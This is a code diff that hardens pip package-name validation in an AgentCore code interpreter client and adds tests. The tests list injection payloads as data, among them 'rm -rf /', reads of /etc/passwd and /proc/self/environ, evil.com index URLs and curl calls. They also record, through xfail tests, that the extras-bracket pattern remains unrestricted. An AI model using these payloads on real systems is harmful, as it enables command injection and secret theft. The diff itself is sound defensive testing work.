diff --git a/src/bedrock_agentcore/tools/code_interpreter_client.py b/src/bedrock_agentcore/tools/code_interpreter_client.py index 7c2ab4f6..e8c05639 100644 --- a/src/bedrock_agentcore/tools/code_interpreter_client.py +++ b/src/bedrock_agentcore/tools/code_interpreter_client.py @@ -6,6 +6,7 @@ import base64 import logging +import re import uuid from contextlib import contextmanager from typing import Any, Dict, Generator, List, Optional, Union @@ -19,6 +20,10 @@ from .config import Certificate DEFAULT_IDENTIFIER = "aws.codeinterpreter.v1" + +VALID_PACKAGE_NAME = re.compile( + r"^[a-zA-Z0-9]([a-zA-Z0-9._-]*[a-zA-Z0-9])?(\[.*\])?(==|>=|<=|!=|~=|>|<)?[a-zA-Z0-9.*]*$" +) DEFAULT_TIMEOUT = 900 @@ -600,10 +605,10 @@ def install_packages( if not packages: raise ValueError("At least one package name must be provided") - # Sanitize package names (basic validation) + # Validate package names against allowlist pattern for pkg in packages: - if any(char in pkg for char in [";", "&", "|", "`", "$"]): - raise ValueError(f"Invalid characters in package name: {pkg}") + if not VALID_PACKAGE_NAME.match(pkg): + raise ValueError(f"Invalid package name: {pkg}") packages_str = " ".join(packages) upgrade_flag = "--upgrade " if upgrade else "" diff --git a/tests/bedrock_agentcore/tools/test_code_interpreter_client.py b/tests/bedrock_agentcore/tools/test_code_interpreter_client.py index 9d039b58..e856c3fc 100644 --- a/tests/bedrock_agentcore/tools/test_code_interpreter_client.py +++ b/tests/bedrock_agentcore/tools/test_code_interpreter_client.py @@ -984,23 +984,23 @@ def test_install_packages_invalid_characters_error( client.session_id = "test-session-id" # Act & Assert - semicolon - with pytest.raises(ValueError, match="Invalid characters in package name"): + with pytest.raises(ValueError, match="Invalid package name"): client.install_packages(["pandas; rm -rf /"]) # Act & Assert - pipe - with pytest.raises(ValueError, match="Invalid characters in package name"): + with pytest.raises(ValueError, match="Invalid package name"): client.install_packages(["pandas | cat /etc/passwd"]) # Act & Assert - ampersand - with pytest.raises(ValueError, match="Invalid characters in package name"): + with pytest.raises(ValueError, match="Invalid package name"): client.install_packages(["pandas && malicious"]) # Act & Assert - backtick - with pytest.raises(ValueError, match="Invalid characters in package name"): + with pytest.raises(ValueError, match="Invalid package name"): client.install_packages(["pandas`whoami`"]) # Act & Assert - dollar sign - with pytest.raises(ValueError, match="Invalid characters in package name"): + with pytest.raises(ValueError, match="Invalid package name"): client.install_packages(["pandas$HOME"]) @patch("bedrock_agentcore.tools.code_interpreter_client.get_control_plane_endpoint") @@ -1624,3 +1624,131 @@ def test_create_code_interpreter_without_certificates( # Assert — certificates key should NOT be in the call call_kwargs = client.control_plane_client.create_code_interpreter.call_args[1] assert "certificates" not in call_kwargs + + +@patch("bedrock_agentcore.tools.code_interpreter_client.get_control_plane_endpoint") +@patch("bedrock_agentcore.tools.code_interpreter_client.get_data_plane_endpoint") +@patch("bedrock_agentcore.tools.code_interpreter_client.boto3") +class TestInstallPackagesAllowlist: + """Verify install_packages() rejects all flag-injection and shell-injection + payloads, and still accepts legitimate package specs. + + Tests call install_packages() end-to-end so the full validation path is + exercised. The extras-bracket cases are marked xfail because the current + regex uses '.*' inside the brackets and does not yet restrict that group. + """ + + def _client(self, mock_boto3): + mock_session = MagicMock() + mock_session.client.return_value = MagicMock() + mock_boto3.Session.return_value = mock_session + client = CodeInterpreter("us-west-2") + client.identifier = "test.identifier" + client.session_id = "test-session-id" + return client + + # ------------------------------------------------------------------ # + # Pip flag injection # + # ------------------------------------------------------------------ # + @pytest.mark.parametrize( + "pkg", + [ + "-r", + "-i", + "-e", + "-f", + "-c", + "--index-url", + "--extra-index-url", + "--find-links", + "--trusted-host", + "--no-deps", + "--pre", + "--upgrade", + "--require-hashes", + # flag + value as a single element + "--index-url http://evil.com", + "--extra-index-url http://evil.com", + "-r /etc/passwd", + "-r /proc/self/environ", + ], + ) + def test_pip_flags_blocked(self, mock_boto3, mock_get_data_endpoint, mock_get_control_endpoint, pkg): + client = self._client(mock_boto3) + with pytest.raises(ValueError, match="Invalid package name"): + client.install_packages([pkg]) + + # ------------------------------------------------------------------ # + # Shell metacharacter and path injection # + # ------------------------------------------------------------------ # + @pytest.mark.parametrize( + "pkg", + [ + "pandas; rm -rf /", + "pandas | cat /etc/passwd", + "pandas && malicious", + "pandas`whoami`", + "pandas$HOME", + # two packages smuggled as one argument + "pandas numpy", + # path traversal + "/etc/passwd", + "../../../etc/passwd", + # newline splitting the pip command + "pandas\n--extra-index-url http://evil.com", + "pandas\nrm -rf /", + ], + ) + def test_shell_and_path_injection_blocked(self, mock_boto3, mock_get_data_endpoint, mock_get_control_endpoint, pkg): + client = self._client(mock_boto3) + with pytest.raises(ValueError, match="Invalid package name"): + client.install_packages([pkg]) + + # ------------------------------------------------------------------ # + # Extras bracket injection — xfail: '.*' in extras not yet restricted # + # ------------------------------------------------------------------ # + @pytest.mark.xfail(reason="extras group uses '.*' — arbitrary content not yet restricted") + @pytest.mark.parametrize( + "pkg", + [ + "pandas[; cat /etc/passwd]", + "numpy[$(id)]", + "scipy[&& curl http://evil.com]", + "requests[| whoami]", + ], + ) + def test_extras_injection_blocked(self, mock_boto3, mock_get_data_endpoint, mock_get_control_endpoint, pkg): + client = self._client(mock_boto3) + with pytest.raises(ValueError, match="Invalid package name"): + client.install_packages([pkg]) + + # ------------------------------------------------------------------ # + # Valid package specs — must continue to be accepted # + # ------------------------------------------------------------------ # + @pytest.mark.parametrize( + "pkg", + [ + "pandas", + "numpy", + "scikit-learn", + "my_package", + "package.name", + "A", + "Package123", + "pandas[excel]", + "requests[security]", + "requests[security,socks]", + "numpy>=1.0", + "scipy==1.7.*", + "pandas!=2.0", + "requests~=2.28", + "urllib3<2.0", + "numpy>1.0", + "pandas[excel]>=1.5", + ], + ) + def test_valid_packages_accepted(self, mock_boto3, mock_get_data_endpoint, mock_get_control_endpoint, pkg): + client = self._client(mock_boto3) + client.data_plane_client.invoke_code_interpreter.return_value = {"stream": []} + # Should not raise + client.install_packages([pkg])